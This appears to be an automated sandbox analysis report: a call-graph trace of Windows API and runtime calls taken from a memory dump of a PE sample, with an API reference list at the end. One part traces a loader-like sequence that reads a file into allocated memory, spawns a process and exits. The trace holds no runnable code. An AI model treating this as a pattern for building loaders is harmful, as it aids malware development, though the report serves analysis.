85956->85959 85960 41e567 CloseHandle 85957->85960 85958 41e585 85961 41e5a7 85958->85961 85986 417f49 67 API calls 3 library calls 85958->85986 85962 41b9c4 __commit 67 API calls 85959->85962 85960->85952 85963 41e573 GetLastError 85960->85963 85961->85945 85962->85953 85963->85952 85965->85931 85966->85946 85967->85934 85968->85939 85970->85945 85971->85946 85973 41b9d1 85972->85973 85974 41b9e9 85972->85974 85975 417f36 __read 67 API calls 85973->85975 85976 417f36 __read 67 API calls 85974->85976 85984 41ba2e 85974->85984 85977 41b9d6 85975->85977 85978 41ba17 85976->85978 85979 417f23 __setmode 67 API calls 85977->85979 85980 417f23 __setmode 67 API calls 85978->85980 85981 41b9de 85979->85981 85982 41ba1e 85980->85982 85981->85954 85983 417ebb __setmode 6 API calls 85982->85983 85983->85984 85984->85954 85985->85958 85986->85961 85988 415126 __setmode 85987->85988 85989 41513a _memset 85988->85989 85990 41516f 85988->85990 85991 415164 __setmode 85988->85991 86016 417f23 67 API calls __getptd_noexit 85989->86016 85992 415965 __lock_file 68 API calls 85990->85992 85991->85660 85994 415177 85992->85994 86000 414f10 85994->86000 85995 415154 86017 417ebb 6 API calls 2 library calls 85995->86017 86001 414f4c 86000->86001 86003 414f2e _memset 86000->86003 86018 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 86001->86018 86002 414f37 86069 417f23 67 API calls __getptd_noexit 86002->86069 86003->86001 86003->86002 86007 414f8b 86003->86007 86007->86001 86008 4150a9 _memset 86007->86008 86009 41453a __fileno 67 API calls 86007->86009 86015 4150d5 _memset 86007->86015 86019 41ed9e 86007->86019 86049 41e6b1 86007->86049 86071 41ee9b 67 API calls 3 library calls 86007->86071 86072 417f23 67 API calls __getptd_noexit 86008->86072 86009->86007 86014 414f3c 86070 417ebb 6 API calls 2 library calls 86014->86070 86073 417f23 67 API calls __getptd_noexit 86015->86073 86016->85995 86018->85991 86020 41edaa __setmode 86019->86020 86021 41edb2 86020->86021 86022 41edcd 
86020->86022 86143 417f36 67 API calls __getptd_noexit 86021->86143 86024 41eddb 86022->86024 86028 41ee1c 86022->86028 86145 417f36 67 API calls __getptd_noexit 86024->86145 86026 41edb7 86144 417f23 67 API calls __getptd_noexit 86026->86144 86027 41ede0 86146 417f23 67 API calls __getptd_noexit 86027->86146 86031 41ee29 86028->86031 86032 41ee3d 86028->86032 86148 417f36 67 API calls __getptd_noexit 86031->86148 86033 41ba3b ___lock_fhandle 68 API calls 86032->86033 86036 41ee43 86033->86036 86034 41ede7 86147 417ebb 6 API calls 2 library calls 86034->86147 86038 41ee50 86036->86038 86039 41ee66 86036->86039 86037 41ee2e 86149 417f23 67 API calls __getptd_noexit 86037->86149 86074 41e7dc 86038->86074 86150 417f23 67 API calls __getptd_noexit 86039->86150 86042 41edbf __setmode 86042->86007 86045 41ee5e 86152 41ee91 LeaveCriticalSection __unlock_fhandle 86045->86152 86046 41ee6b 86151 417f36 67 API calls __getptd_noexit 86046->86151 86050 41e6c1 86049->86050 86055 41e6de 86049->86055 86156 417f23 67 API calls __getptd_noexit 86050->86156 86052 41e6d6 86052->86007 86053 41e6c6 86157 417ebb 6 API calls 2 library calls 86053->86157 86055->86052 86056 41e713 86055->86056 86153 423600 86055->86153 86058 41453a __fileno 67 API calls 86056->86058 86059 41e727 86058->86059 86060 41ed9e __read 79 API calls 86059->86060 86061 41e72e 86060->86061 86061->86052 86062 41453a __fileno 67 API calls 86061->86062 86063 41e751 86062->86063 86063->86052 86064 41453a __fileno 67 API calls 86063->86064 86065 41e75d 86064->86065 86065->86052 86066 41453a __fileno 67 API calls 86065->86066 86067 41e769 86066->86067 86068 41453a __fileno 67 API calls 86067->86068 86068->86052 86069->86014 86071->86007 86072->86014 86073->86014 86075 41e813 86074->86075 86076 41e7f8 86074->86076 86077 41e822 86075->86077 86079 41e849 86075->86079 86078 417f36 __read 67 API calls 86076->86078 86080 417f36 __read 67 API calls 86077->86080 86081 41e7fd 86078->86081 86083 41e868 86079->86083 86094 41e87c 
86079->86094 86082 41e827 86080->86082 86084 417f23 __setmode 67 API calls 86081->86084 86085 417f23 __setmode 67 API calls 86082->86085 86086 417f36 __read 67 API calls 86083->86086 86095 41e805 86084->86095 86088 41e82e 86085->86088 86090 41e86d 86086->86090 86087 41e8d4 86089 417f36 __read 67 API calls 86087->86089 86091 417ebb __setmode 6 API calls 86088->86091 86092 41e8d9 86089->86092 86093 417f23 __setmode 67 API calls 86090->86093 86091->86095 86096 417f23 __setmode 67 API calls 86092->86096 86097 41e874 86093->86097 86094->86087 86094->86095 86098 41e8b0 86094->86098 86099 41e8f5 86094->86099 86095->86045 86096->86097 86100 417ebb __setmode 6 API calls 86097->86100 86098->86087 86103 41e8bb ReadFile 86098->86103 86101 416fb6 __malloc_crt 67 API calls 86099->86101 86100->86095 86104 41e90b 86101->86104 86105 41ed62 GetLastError 86103->86105 86106 41e9e7 86103->86106 86109 41e931 86104->86109 86110 41e913 86104->86110 86107 41ebe8 86105->86107 86108 41ed6f 86105->86108 86106->86105 86113 41e9fb 86106->86113 86117 417f49 __dosmaperr 67 API calls 86107->86117 86138 41eb6d 86107->86138 86111 417f23 __setmode 67 API calls 86108->86111 86114 423462 __lseeki64_nolock 69 API calls 86109->86114 86112 417f23 __setmode 67 API calls 86110->86112 86115 41ed74 86111->86115 86116 41e918 86112->86116 86121 41ea17 86113->86121 86122 41ec2d 86113->86122 86113->86138 86118 41e93d 86114->86118 86119 417f36 __read 67 API calls 86115->86119 86120 417f36 __read 67 API calls 86116->86120 86117->86138 86118->86103 86119->86138 86120->86095 86124 41ea7d ReadFile 86121->86124 86130 41eafa 86121->86130 86125 41eca5 ReadFile 86122->86125 86122->86138 86123 413a88 __fcloseall 67 API calls 86123->86095 86127 41ea9b GetLastError 86124->86127 86133 41eaa5 86124->86133 86128 41ecc4 GetLastError 86125->86128 86134 41ecce 86125->86134 86126 41ebbe MultiByteToWideChar 86129 41ebe2 GetLastError 86126->86129 86126->86138 86127->86121 86127->86133 86128->86122 86128->86134 86129->86107 86131 
41eb75 86130->86131 86132 41eb68 86130->86132 86130->86138 86139 41eb32 86130->86139 86131->86139 86140 41ebac 86131->86140 86135 417f23 __setmode 67 API calls 86132->86135 86133->86121 86136 423462 __lseeki64_nolock 69 API calls 86133->86136 86134->86122 86137 423462 __lseeki64_nolock 69 API calls 86134->86137 86135->86138 86136->86133 86137->86134 86138->86095 86138->86123 86139->86126 86141 423462 __lseeki64_nolock 69 API calls 86140->86141 86142 41ebbb 86141->86142 86142->86126 86143->86026 86144->86042 86145->86027 86146->86034 86148->86037 86149->86034 86150->86046 86151->86045 86152->86042 86154 416fb6 __malloc_crt 67 API calls 86153->86154 86155 423615 86154->86155 86155->86056 86156->86053 86161 414cef GetSystemTimeAsFileTime __aulldiv 86158->86161 86160 4431ef 86160->85663 86161->86160 86162->85670 86164->85676 86169 4523e1 _wcscpy 86165->86169 86166 4151b0 81 API calls __fread_nolock 86166->86169 86167 44afdc GetSystemTimeAsFileTime 86167->86169 86168 452553 86168->85585 86168->85586 86169->86166 86169->86167 86169->86168 86170 41557c 105 API calls _fseek 86169->86170 86170->86169 86172 44b1b4 86171->86172 86173 44b1a6 86171->86173 86175 44b1ca 86172->86175 86176 44b1c2 86172->86176 86177 414e06 138 API calls 86172->86177 86174 414e06 138 API calls 86173->86174 86174->86172 86206 4352d1 81 API calls 2 library calls 86175->86206 86176->85614 86178 44b2c1 86177->86178 86178->86175 86180 44b2cf 86178->86180 86182 44b2dc 86180->86182 86185 414e94 __fcloseall 106 API calls 86180->86185 86181 44b20d 86183 44b211 86181->86183 86184 44b23b 86181->86184 86182->85614 86188 414e94 __fcloseall 106 API calls 86183->86188 86189 44b21e 86183->86189 86207 43526e 86184->86207 86185->86182 86187 44b242 86191 44b270 86187->86191 86192 44b248 86187->86192 86188->86189 86190 414e94 __fcloseall 106 API calls 86189->86190 86194 44b22e 86189->86194 86190->86194 86217 44b0af 111 API calls 86191->86217 86195 44b255 86192->86195 86197 414e94 __fcloseall 106 API calls 86192->86197 
86194->85614 86198 44b265 86195->86198 86200 414e94 __fcloseall 106 API calls 86195->86200 86196 44b276 86218 43522c 67 API calls __fcloseall 86196->86218 86197->86195 86198->85614 86200->86198 86201 44b27c 86202 44b289 86201->86202 86203 414e94 __fcloseall 106 API calls 86201->86203 86204 44b299 86202->86204 86205 414e94 __fcloseall 106 API calls 86202->86205 86203->86202 86204->85614 86205->86204 86206->86181 86208 4138ba _malloc 67 API calls 86207->86208 86209 43527d 86208->86209 86210 4138ba _malloc 67 API calls 86209->86210 86211 43528d 86210->86211 86212 4138ba _malloc 67 API calls 86211->86212 86213 43529d 86212->86213 86216 4352bc 86213->86216 86219 43522c 67 API calls __fcloseall 86213->86219 86215 4352c8 86215->86187 86216->86187 86217->86196 86218->86201 86219->86215 86220->85491 86222 410148 SHGetDesktopFolder 86221->86222 86225 4101a3 _wcscpy 86221->86225 86223 41015a _wcscpy 86222->86223 86222->86225 86224 41018a SHGetPathFromIDListW 86223->86224 86223->86225 86224->86225 86225->85495 86226->85497 86228 40f5e0 152 API calls 86227->86228 86229 40f417 86228->86229 86230 42ca37 86229->86230 86232 40f42c 86229->86232 86233 42ca1f 86229->86233 86231 452574 140 API calls 86230->86231 86235 42ca50 86231->86235 86275 4037e0 139 API calls 7 library calls 86232->86275 86276 43717f 110 API calls _printf 86233->86276 86238 42ca76 86235->86238 86239 42ca54 86235->86239 86237 42ca2d 86237->86230 86242 41171a 75 API calls 86238->86242 86241 434fe1 106 API calls 86239->86241 86240 40f446 86240->85494 86243 42ca5e 86241->86243 86257 42cacc ctype 86242->86257 86277 43717f 110 API calls _printf 86243->86277 86245 42ccc3 86247 413a88 __fcloseall 67 API calls 86245->86247 86246 42ca6c 86246->86238 86248 42cccd 86247->86248 86249 434fe1 106 API calls 86248->86249 86250 42ccda 86249->86250 86254 401b70 75 API calls 86254->86257 86257->86245 86257->86254 86258 445051 86257->86258 86261 402cc0 86257->86261 86269 4026a0 86257->86269 86278 44c80c 87 API calls 3 library calls 
86257->86278 86279 44b408 75 API calls 86257->86279 86259 41171a 75 API calls 86258->86259 86260 445080 _memcpy_s 86259->86260 86260->86257 86260->86260 86262 402d71 86261->86262 86263 402cd2 _memcpy_s ctype 86261->86263 86265 41171a 75 API calls 86262->86265 86264 41171a 75 API calls 86263->86264 86266 402cd9 86264->86266 86265->86263 86267 402cff 86266->86267 86268 41171a 75 API calls 86266->86268 86267->86257 86268->86267 86270 4026af 86269->86270 86273 40276b 86269->86273 86271 41171a 75 API calls 86270->86271 86272 4026ee ctype 86270->86272 86270->86273 86271->86272 86272->86273 86274 41171a 75 API calls 86272->86274 86273->86257 86274->86272 86275->86240 86276->86237 86277->86246 86278->86257 86279->86257 86280->85504 86281->85505 86282 553d3e0 86297 553b030 86282->86297 86284 553d46f 86300 553d2d0 86284->86300 86286 553d498 CreateFileW 86288 553d4e7 86286->86288 86289 553d4ec 86286->86289 86289->86288 86290 553d503 VirtualAlloc 86289->86290 86290->86288 86291 553d521 ReadFile 86290->86291 86291->86288 86292 553d53c 86291->86292 86293 553c2d0 13 API calls 86292->86293 86295 553d56f 86293->86295 86294 553d592 ExitProcess 86294->86288 86295->86294 86296 553d360 CreateProcessW 86295->86296 86296->86294 86303 553e4a0 GetPEB 86297->86303 86299 553b6bb 86299->86284 86301 553d2d9 Sleep 86300->86301 86302 553d2e7 86301->86302 86304 553e4ca 86303->86304 86304->86299 86305 431914 86306 431920 86305->86306 86307 431928 86306->86307 86308 43193d 86306->86308 86569 45e62e 116 API calls 3 library calls 86307->86569 86570 47f2b4 174 API calls 86308->86570 86311 43194a 86314 4095b0 ctype 86311->86314 86571 45e62e 116 API calls 3 library calls 86311->86571 86312 409708 86314->86312 86315 4097af 86314->86315 86317 409894 86314->86317 86319 4315b8 WaitForSingleObject 86314->86319 86322 431623 Sleep 86314->86322 86328 40986e Sleep 86314->86328 86329 4098f1 TranslateMessage DispatchMessageW 86314->86329 86347 4319c9 VariantClear 86314->86347 86348 4092c0 VariantClear 86314->86348 
86349 45e62e 116 API calls 86314->86349 86351 40b380 86314->86351 86375 409340 86314->86375 86408 409030 86314->86408 86422 40d300 86314->86422 86427 40d320 86314->86427 86433 409a40 86314->86433 86572 40e380 VariantClear ctype 86314->86572 86315->86312 86556 40d590 VariantClear 86315->86556 86317->86314 86331 431673 CloseHandle 86317->86331 86332 43170c GetExitCodeProcess CloseHandle 86317->86332 86333 40d590 VariantClear 86317->86333 86335 46dd22 133 API calls 86317->86335 86337 46e641 134 API calls 86317->86337 86338 431781 Sleep 86317->86338 86346 4092c0 VariantClear 86317->86346 86557 447e59 75 API calls 86317->86557 86558 453b07 77 API calls 86317->86558 86559 4646a2 76 API calls 86317->86559 86561 444233 88 API calls _wcslen 86317->86561 86562 457509 VariantClear 86317->86562 86563 404120 86317->86563 86567 4717e3 VariantClear 86317->86567 86568 436272 6 API calls 86317->86568 86319->86314 86321 4315d6 GetExitCodeProcess CloseHandle 86319->86321 86560 40d590 VariantClear 86321->86560 86322->86317 86325 43163b timeGetTime 86322->86325 86325->86317 86328->86317 86330 409880 timeGetTime 86328->86330 86329->86314 86330->86317 86331->86317 86332->86317 86333->86317 86335->86317 86337->86317 86338->86314 86346->86317 86347->86314 86348->86314 86349->86314 86352 40b3a5 86351->86352 86353 40b53d 86351->86353 86354 430a99 86352->86354 86359 40b3b6 86352->86359 86573 45e62e 116 API calls 3 library calls 86353->86573 86574 45e62e 116 API calls 3 library calls 86354->86574 86357 40b528 86357->86314 86358 430aae 86362 4092c0 VariantClear 86358->86362 86359->86358 86363 40b3f2 86359->86363 86371 40b4fd ctype 86359->86371 86361 430dc9 86361->86361 86362->86357 86364 430ae9 VariantClear 86363->86364 86366 40b429 86363->86366 86373 40b476 ctype 86363->86373 86374 40b43b ctype 86364->86374 86365 40b4eb 86365->86371 86576 40e380 VariantClear ctype 86365->86576 86366->86374 86575 40e380 VariantClear ctype 86366->86575 86367 430d41 VariantClear 86367->86371 86370 41171a 75 API 
calls 86370->86373 86371->86357 86577 45e62e 116 API calls 3 library calls 86371->86577 86372 430d08 ctype 86372->86367 86372->86371 86373->86365 86373->86372 86374->86370 86374->86373 86376 409386 86375->86376 86377 409395 86375->86377 86578 4042f0 75 API calls __cinit 86376->86578 86380 42fba9 86377->86380 86382 42fc07 86377->86382 86384 42fc85 86377->86384 86387 42fd4f 86377->86387 86388 42fcd8 86377->86388 86392 42fd39 86377->86392 86396 40946f 86377->86396 86397 40947b 86377->86397 86399 4094c1 86377->86399 86404 4092c0 VariantClear 86377->86404 86407 409484 ctype 86377->86407 86581 453155 75 API calls 86377->86581 86583 40c620 118 API calls 86377->86583 86585 45e62e 116 API calls 3 library calls 86377->86585 86582 45e62e 116 API calls 3 library calls 86380->86582 86584 45e62e 116 API calls 3 library calls 86382->86584 86586 4781ae 140 API calls 86384->86586 86389 4092c0 VariantClear 86387->86389 86588 47f2b4 174 API calls 86388->86588 86389->86407 86391 42fc9c 86391->86407 86587 45e62e 116 API calls 3 library calls 86391->86587 86590 45e62e 116 API calls 3 library calls 86392->86590 86393 42fce9 86393->86407 86589 45e62e 116 API calls 3 library calls 86393->86589 86579 409210 VariantClear 86396->86579 86402 4092c0 VariantClear 86397->86402 86399->86407 86580 404260 76 API calls 86399->86580 86402->86407 86404->86377 86405 4094e1 86406 4092c0 VariantClear 86405->86406 86406->86407 86407->86314 86591 409110 117 API calls 86408->86591 86410 42ceb6 86601 410ae0 VariantClear ctype 86410->86601 86412 42cebf 86413 42cea9 86600 45e62e 116 API calls 3 library calls 86413->86600 86415 40906e 86415->86410 86415->86413 86416 4090a4 86415->86416 86592 404160 86416->86592 86419 4090f0 ctype 86419->86314 86420 4092c0 VariantClear 86421 4090be ctype 86420->86421 86421->86419 86421->86420 86423 4292e3 86422->86423 86424 40d30c 86422->86424 86425 429323 86423->86425 86426 4292fd TranslateAcceleratorW 86423->86426 86424->86314 86425->86314 86426->86424 86428 4296d0 86427->86428 
86431 40d32f 86427->86431 86428->86314 86429 40d33c 86429->86314 86430 42972a IsDialogMessageW 86430->86429 86430->86431 86431->86429 86431->86430 86736 4340ec GetClassLongW 86431->86736 86434 409a66 _wcslen 86433->86434 86435 40aade _memcpy_s ctype 86434->86435 86436 41171a 75 API calls 86434->86436 86738 401380 75 API calls 86435->86738 86437 409a9c _memcpy_s 86436->86437 86438 41171a 75 API calls 86437->86438 86440 409abd 86438->86440 86440->86435 86443 409aeb CharUpperBuffW 86440->86443 86447 409b09 ctype 86440->86447 86441 42cee9 86442 41171a 75 API calls 86441->86442 86444 42cf10 _memcpy_s 86442->86444 86443->86447 86770 45e62e 116 API calls 3 library calls 86444->86770 86483 409b88 ctype 86447->86483 86739 47d10e 150 API calls 86447->86739 86448 4092c0 VariantClear 86449 42e5e0 86448->86449 86771 410ae0 VariantClear ctype 86449->86771 86451 42e5f2 86452 409e4a 86452->86444 86454 41171a 75 API calls 86452->86454 86459 409ea4 86452->86459 86453 40aa5b 86456 41171a 75 API calls 86453->86456 86454->86459 86455 41171a 75 API calls 86455->86483 86473 40aa81 _memcpy_s ctype 86456->86473 86457 409ed0 86461 42d50d 86457->86461 86517 409ef8 _memcpy_s ctype 86457->86517 86749 40b800 VariantClear VariantClear ctype 86457->86749 86459->86457 86460 41171a 75 API calls 86459->86460 86462 42d480 86460->86462 86463 42d527 86461->86463 86750 40b800 VariantClear VariantClear ctype 86461->86750 86467 42d491 86462->86467 86745 44b3f6 75 API calls 86462->86745 86463->86517 86751 40e2e0 VariantClear ctype 86463->86751 86464 42d195 VariantClear 86464->86483 86465 40a3a7 86470 40a415 86465->86470 86515 42db5c 86465->86515 86746 40df50 75 API calls 86467->86746 86476 41171a 75 API calls 86470->86476 86471 4092c0 VariantClear 86471->86483 86481 41171a 75 API calls 86473->86481 86492 40a41c 86476->86492 86479 42db96 86757 45e62e 116 API calls 3 library calls 86479->86757 86481->86435 86482 42d4a6 86747 4530b3 75 API calls 86482->86747 86483->86444 86483->86452 86483->86453 86483->86455 
86483->86464 86483->86471 86483->86473 86484 42d128 86483->86484 86488 42d20c 86483->86488 86499 42dbb9 86483->86499 86740 40c3e0 75 API calls 86483->86740 86741 40c620 118 API calls 86483->86741 86743 40be00 75 API calls 2 library calls 86483->86743 86744 40e380 VariantClear ctype 86483->86744 86486 4092c0 VariantClear 86484->86486 86491 42d131 86486->86491 86487 42d4d7 86748 4530b3 75 API calls 86487->86748 86488->86314 86742 410ae0 VariantClear ctype 86491->86742 86502 40a481 86492->86502 86758 40c8a0 VariantClear ctype 86492->86758 86494 402cc0 75 API calls 86494->86517 86498 4092c0 VariantClear 86531 40a534 _memcpy_s ctype 86498->86531 86499->86448 86500 41171a 75 API calls 86500->86517 86501 411421 74 API calls __cinit 86501->86517 86503 40a4ed 86502->86503 86504 42dc1e VariantClear 86502->86504 86502->86531 86508 40a4ff ctype 86503->86508 86759 40e380 VariantClear ctype 86503->86759 86504->86508 86507 41171a 75 API calls 86507->86531 86508->86507 86508->86531 86512 44b3f6 75 API calls 86512->86517 86513 42deb6 VariantClear 86513->86531 86514 40a73c 86516 42e237 86514->86516 86524 40a76b 86514->86524 86756 4721e5 VariantClear 86515->86756 86763 46e709 VariantClear VariantClear ctype 86516->86763 86517->86435 86517->86465 86517->86479 86517->86494 86517->86500 86517->86501 86517->86512 86517->86515 86520 40a053 86517->86520 86752 45ee98 75 API calls 86517->86752 86753 4019e0 76 API calls 86517->86753 86754 404260 76 API calls 86517->86754 86755 409210 VariantClear 86517->86755 86518 42dfe9 VariantClear 86518->86531 86519 42df47 VariantClear 86519->86531 86520->86314 86521 40a7a2 86536 40a7ad ctype 86521->86536 86764 40b800 VariantClear VariantClear ctype 86521->86764 86523 40e380 VariantClear 86523->86531 86524->86521 86546 40a800 ctype 86524->86546 86737 40b800 VariantClear VariantClear ctype 86524->86737 86527 41171a 75 API calls 86527->86531 86528 40a8b0 86542 40a8c2 ctype 86528->86542 86766 40e380 VariantClear ctype 86528->86766 86529 42e312 86532 42e337 
VariantClear 86529->86532 86529->86542 86530 41171a 75 API calls 86533 42dd10 VariantInit VariantCopy 86530->86533 86531->86498 86531->86513 86531->86514 86531->86516 86531->86518 86531->86519 86531->86523 86531->86527 86531->86530 86760 46e9cd 75 API calls 86531->86760 86761 409210 VariantClear 86531->86761 86762 44cc6c VariantClear ctype 86531->86762 86532->86542 86533->86531 86535 42dd30 VariantClear 86533->86535 86534 42e3b2 86543 42e3da VariantClear 86534->86543 86550 40a91a ctype 86534->86550 86535->86531 86537 40a7ee 86536->86537 86541 42e2a7 VariantClear 86536->86541 86536->86546 86537->86546 86765 40e380 VariantClear ctype 86537->86765 86539 40a908 86539->86550 86767 40e380 VariantClear ctype 86539->86767 86541->86546 86542->86534 86542->86539 86543->86550 86545 42e47f 86549 42e4a3 VariantClear 86545->86549 86555 40a957 ctype 86545->86555 86546->86528 86546->86529 86547 40a945 86547->86555 86768 40e380 VariantClear ctype 86547->86768 86549->86555 86550->86545 86550->86547 86552 40aa22 ctype 86552->86314 86553 42e559 VariantClear 86553->86555 86555->86552 86555->86553 86769 40e380 VariantClear ctype 86555->86769 86556->86312 86557->86317 86558->86317 86559->86317 86560->86317 86561->86317 86562->86317 86564 40412e 86563->86564 86565 4092c0 VariantClear 86564->86565 86566 404138 86565->86566 86566->86338 86567->86317 86568->86317 86569->86314 86570->86311 86571->86314 86572->86314 86573->86354 86574->86358 86575->86374 86576->86371 86577->86361 86578->86377 86579->86397 86580->86405 86581->86377 86582->86407 86583->86377 86584->86407 86585->86377 86586->86391 86587->86407 86588->86393 86589->86407 86590->86387 86591->86415 86593 4092c0 VariantClear 86592->86593 86594 40416e 86593->86594 86595 404120 VariantClear 86594->86595 86596 40419b 86595->86596 86602 4734b7 86596->86602 86646 40efe0 86596->86646 86597 4041c6 86597->86410 86597->86421 86600->86410 86601->86412 86603 453063 111 API calls 86602->86603 86604 4734d7 86603->86604 86605 473545 86604->86605 
86606 47350c 86604->86606 86654 463c42 86605->86654 86608 4092c0 VariantClear 86606->86608 86613 473514 86608->86613 86609 473558 86610 47355c 86609->86610 86626 473595 86609->86626 86611 4092c0 VariantClear 86610->86611 86621 473564 86611->86621 86612 473616 86667 463d7e 86612->86667 86613->86597 86615 473622 86617 473697 86615->86617 86618 47362c 86615->86618 86616 453063 111 API calls 86616->86626 86701 457838 86617->86701 86622 4092c0 VariantClear 86618->86622 86621->86597 86624 473634 86622->86624 86624->86597 86625 473655 86629 4092c0 VariantClear 86625->86629 86626->86612 86626->86616 86626->86625 86713 462f5a 87 API calls __wcsicoll 86626->86713 86640 47365d 86629->86640 86630 4736b0 86714 45e62e 116 API calls 3 library calls 86630->86714 86631 4736c9 86715 40e7e0 76 API calls 86631->86715 86634 4736db 86644 4736ff 86634->86644 86716 40d030 76 API calls 86634->86716 86635 4736ba GetCurrentProcess TerminateProcess 86635->86631 86637 473731 86642 473744 FreeLibrary 86637->86642 86643 47374b 86637->86643 86638 4736f1 86717 46b945 134 API calls 2 library calls 86638->86717 86640->86597 86642->86643 86643->86597 86644->86637 86718 40d030 76 API calls 86644->86718 86719 46b945 134 API calls 2 library calls 86644->86719 86647 40eff5 CreateFileW 86646->86647 86648 4299bf 86646->86648 86649 40f017 86647->86649 86648->86649 86650 4299c4 CreateFileW 86648->86650 86649->86597 86650->86649 86651 4299ea 86650->86651 86735 40e0d0 SetFilePointerEx SetFilePointerEx 86651->86735 86653 4299f5 86653->86649 86720 45335b 76 API calls 86654->86720 86656 463c5d 86721 442c52 80 API calls _wcslen 86656->86721 86658 463c72 86660 40c060 75 API calls 86658->86660 86666 463cac 86658->86666 86661 463c8e 86660->86661 86722 4608ce 75 API calls _memcpy_s 86661->86722 86663 463ca4 86664 40c740 75 API calls 86663->86664 86664->86666 86665 463cf7 86665->86609 86666->86665 86723 462f5a 87 API calls __wcsicoll 86666->86723 86668 453063 111 API calls 86667->86668 86669 463d99 86668->86669 86670 
463de0 86669->86670 86671 463dca 86669->86671 86725 40c760 78 API calls 86670->86725 86724 453081 111 API calls 86671->86724 86674 463dd0 LoadLibraryW 86675 463e09 86674->86675 86677 463e3e 86675->86677 86680 463e19 86675->86680 86676 463de7 86676->86680 86726 40c760 78 API calls 86676->86726 86681 463e4e 86677->86681 86682 463e7b 86677->86682 86679 463dfb 86679->86680 86727 40c760 78 API calls 86679->86727 86680->86615 86728 40d500 75 API calls 86681->86728 86730 40c760 78 API calls 86682->86730 86686 463e82 GetProcAddress 86690 463e90 86686->86690 86687 463e57 86729 45efe7 77 API calls ctype 86687->86729 86689 463e62 GetProcAddress 86692 463e79 86689->86692 86690->86680 86691 463edf 86690->86691 86690->86692 86691->86680 86694 463eef FreeLibrary 86691->86694 86692->86690 86731 403470 75 API calls _memcpy_s 86692->86731 86694->86680 86695 463eb4 86732 40d500 75 API calls 86695->86732 86697 463ebd 86733 45efe7 77 API calls ctype 86697->86733 86699 463ec8 GetProcAddress 86734 401330 ctype 86699->86734 86702 457a4c 86701->86702 86708 45785f _strcat _wcslen _wcscpy ctype 86701->86708 86709 410d40 86702->86709 86703 453081 111 API calls 86703->86708 86704 443576 78 API calls 86704->86708 86705 40c760 78 API calls 86705->86708 86706 4138ba 67 API calls _malloc 86706->86708 86707 40f580 77 API calls 86707->86708 86708->86702 86708->86703 86708->86704 86708->86705 86708->86706 86708->86707 86710 410d55 86709->86710 86711 410ded VirtualProtect 86710->86711 86712 410dbb 86710->86712 86711->86712 86712->86630 86712->86631 86713->86626 86714->86635 86715->86634 86716->86638 86717->86644 86718->86644 86719->86644 86720->86656 86721->86658 86722->86663 86723->86665 86724->86674 86725->86676 86726->86679 86727->86675 86728->86687 86729->86689 86730->86686 86731->86695 86732->86697 86733->86699 86734->86691 86735->86653 86736->86431 86737->86521 86738->86441 86739->86447 86740->86483 86741->86483 86742->86552 86743->86483 86744->86483 86745->86467 86746->86482 86747->86487 
86748->86457 86749->86461 86750->86463 86751->86517 86752->86517 86753->86517 86754->86517 86755->86517 86756->86479 86757->86499 86758->86492 86759->86508 86760->86531 86761->86531 86762->86531 86763->86521 86764->86536 86765->86546 86766->86542 86767->86550 86768->86555 86769->86555 86770->86499 86771->86451 86772 42919b 86777 40ef10 86772->86777 86775 411421 __cinit 74 API calls 86776 4291aa 86775->86776 86778 41171a 75 API calls 86777->86778 86779 40ef17 86778->86779 86780 42ad48 86779->86780 86785 40ef40 74 API calls __cinit 86779->86785 86782 40ef2a 86786 40e470 86782->86786 86785->86782 86787 40c060 75 API calls 86786->86787 86788 40e483 GetVersionExW 86787->86788 86789 4021e0 75 API calls 86788->86789 86790 40e4bb 86789->86790 86812 40e600 86790->86812 86794 42accc 86798 42ad28 GetSystemInfo 86794->86798 86802 42ad38 GetSystemInfo 86798->86802 86799 40e557 GetCurrentProcess 86832 40ee30 LoadLibraryA GetProcAddress 86799->86832 86800 40e56c 86800->86802 86825 40eee0 86800->86825 86805 40e5c9 86829 40eea0 86805->86829 86808 40e5e0 86810 40e5f1 FreeLibrary 86808->86810 86811 40e5f4 86808->86811 86809 40e5dd FreeLibrary 86809->86808 86810->86811 86811->86775 86813 40e60b 86812->86813 86814 40c740 75 API calls 86813->86814 86815 40e4c2 86814->86815 86816 40e620 86815->86816 86817 40e62a 86816->86817 86818 42ac93 86817->86818 86819 40c740 75 API calls 86817->86819 86820 40e4ce 86819->86820 86820->86794 86821 40ee70 86820->86821 86822 40e551 86821->86822 86823 40ee76 LoadLibraryA 86821->86823 86822->86799 86822->86800 86823->86822 86824 40ee87 GetProcAddress 86823->86824 86824->86822 86826 40e5bf 86825->86826 86827 40eee6 LoadLibraryA 86825->86827 86826->86798 86826->86805 86827->86826 86828 40eef7 GetProcAddress 86827->86828 86828->86826 86833 40eec0 LoadLibraryA GetProcAddress 86829->86833 86831 40e5d3 GetNativeSystemInfo 86831->86808 86831->86809 86832->86800 86833->86831 86834 42e89e 86841 40c000 86834->86841 86836 42e8ac 86837 409a40 165 API calls 
86836->86837 86838 42e8ca 86837->86838 86852 44b92e VariantClear 86838->86852 86840 42f3ae 86842 40c014 86841->86842 86843 40c007 86841->86843 86845 40c01a 86842->86845 86846 40c02c 86842->86846 86853 409210 VariantClear 86843->86853 86854 409210 VariantClear 86845->86854 86847 41171a 75 API calls 86846->86847 86851 40c033 86847->86851 86848 40c00f 86848->86836 86850 40c023 86850->86836 86851->86836 86852->86840 86853->86848 86854->86850
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
